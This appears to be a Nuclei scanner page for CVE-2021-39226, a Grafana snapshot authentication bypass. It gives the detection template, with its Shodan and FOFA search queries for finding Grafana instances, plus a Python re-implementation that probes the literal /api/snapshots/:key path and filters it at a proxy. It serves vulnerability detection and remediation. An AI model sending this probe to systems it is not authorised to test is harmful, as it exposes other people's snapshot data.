Grafana Snapshot - Authentication Bypass
ID: CVE-2021-39226
Severity: high
Author: Evan Rubinstein
Tags: cve2021,cve,grafana,kev
Description
Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
YAML Source
id: CVE-2021-39226

info:
  name: Grafana Snapshot - Authentication Bypass
  author: Evan Rubinstein
  severity: high
  description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
  impact: |
    An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature.
  remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.'
  reference:
    - https://github.com/advisories/GHSA-69j6-29vr-p3j9
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39226
    - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269
    - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/
    - http://www.openwall.com/lists/oss-security/2021/10/05/4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-39226
    cwe-id: CWE-287
    epss-score: 0.97206
    epss-percentile: 0.9981
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve2021,cve,grafana,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/snapshots/:key"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"isSnapshot":true'

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008c4648b1ad2d46d69bdd77beb9dd8780325d54655a1a4688e723c6b6538806a802200a6f5b47055bb048bd03965aa299c2400631daaee167aeff93e29aebdd4034ea:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39226.yaml"
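The following is an added example, not code from the Nuclei project or from this template's author. It re-implements the template's two matchers (HTTP 200 combined with the literal word `"isSnapshot":true` under `matchers-condition: and`) in plain Python so an operator can verify a Grafana instance they administer, or a captured response from it, without running Nuclei. It also shows a path filter for the literal-path block the remediation recommends. The function names `matches_template`, `build_probe_url`, `check_instance` and `should_block`, and the sample responses, are assumptions constructed for this example; the JSON bodies are not captured from a real instance.

```python
"""Re-implementation of the CVE-2021-39226 template's check logic.

Added example for this page; not part of Nuclei or the template itself.
"""
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Literal path the template probes. ":key" is sent verbatim; the template
# relies on the affected server returning the snapshot with the lowest
# database key for it instead of rejecting the request.
SNAPSHOT_PATH = "/api/snapshots/:key"

# Word matcher: this exact substring (no spaces) must appear in the body.
MARKER = '"isSnapshot":true'

# Literal paths the template's remediation says can be blocked at a proxy
# without side effects, as listed on this page.
BLOCKED_LITERAL_PATHS = {
    "/api/snapshots/:key",
    "/api/snapshots-delete/:deleteKey",
    "/dashboard/snapshot/:key",
}


def matches_template(status: int, body: str) -> bool:
    """Evaluate both matchers with matchers-condition: and.

    The status matcher wants HTTP 200 and the word matcher wants MARKER in
    the body; the template reports a finding only when both hit.
    """
    return status == 200 and MARKER in body


def build_probe_url(base_url: str) -> str:
    """Resolve {{BaseURL}}/api/snapshots/:key as the template's path field does."""
    return base_url.rstrip("/") + SNAPSHOT_PATH


def check_instance(base_url: str, timeout: float = 10.0) -> dict:
    """Send the template's single GET (max-request: 1) and evaluate the reply.

    Network failures are returned in the result rather than raised so a
    batch run over many internal hosts keeps going.
    """
    url = build_probe_url(base_url)
    req = urllib.request.Request(url, method="GET",
                                 headers={"User-Agent": "cve-2021-39226-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:           # non-2xx still has a body
        status, body = e.code, e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError) as e:
        return {"url": url, "status": None, "vulnerable": False, "error": str(e)}
    return {"url": url, "status": status,
            "vulnerable": matches_template(status, body), "error": None}


def should_block(request_path: str) -> bool:
    """Proxy-side filter for the literal paths named in the remediation.

    Only the literal ":key" / ":deleteKey" forms are blocked; real snapshot
    keys keep working, matching the remediation's "no side effects" note.
    """
    return urlsplit(request_path).path in BLOCKED_LITERAL_PATHS


# Constructed sample responses (not captured from a real server) showing
# how the matchers separate an affected reply from patched ones.
SAMPLE_AFFECTED = (200, '{"meta":{"isSnapshot":true,"type":"snapshot"},'
                        '"dashboard":{"title":"Example"}}')
SAMPLE_PATCHED = (401, '{"message":"Unauthorized"}')
SAMPLE_NOT_FOUND = (404, '{"message":"Dashboard snapshot not found"}')

if __name__ == "__main__":
    samples = {"affected": SAMPLE_AFFECTED, "patched": SAMPLE_PATCHED,
               "not found": SAMPLE_NOT_FOUND}
    for label, (status, body) in samples.items():
        print(f"{label:>10}: status={status} match={matches_template(status, body)}")
    for path in ("/api/snapshots/:key", "/api/snapshots/abc123?x=1"):
        print(f"block {path}: {should_block(path)}")
```

Because the word matcher is a literal substring match, a body serialized with a space after the colon (`"isSnapshot": true`) would not trigger the template even on an affected host; Grafana emits compact JSON, but that sensitivity is worth remembering when reading a negative result from behind a proxy that reformats responses.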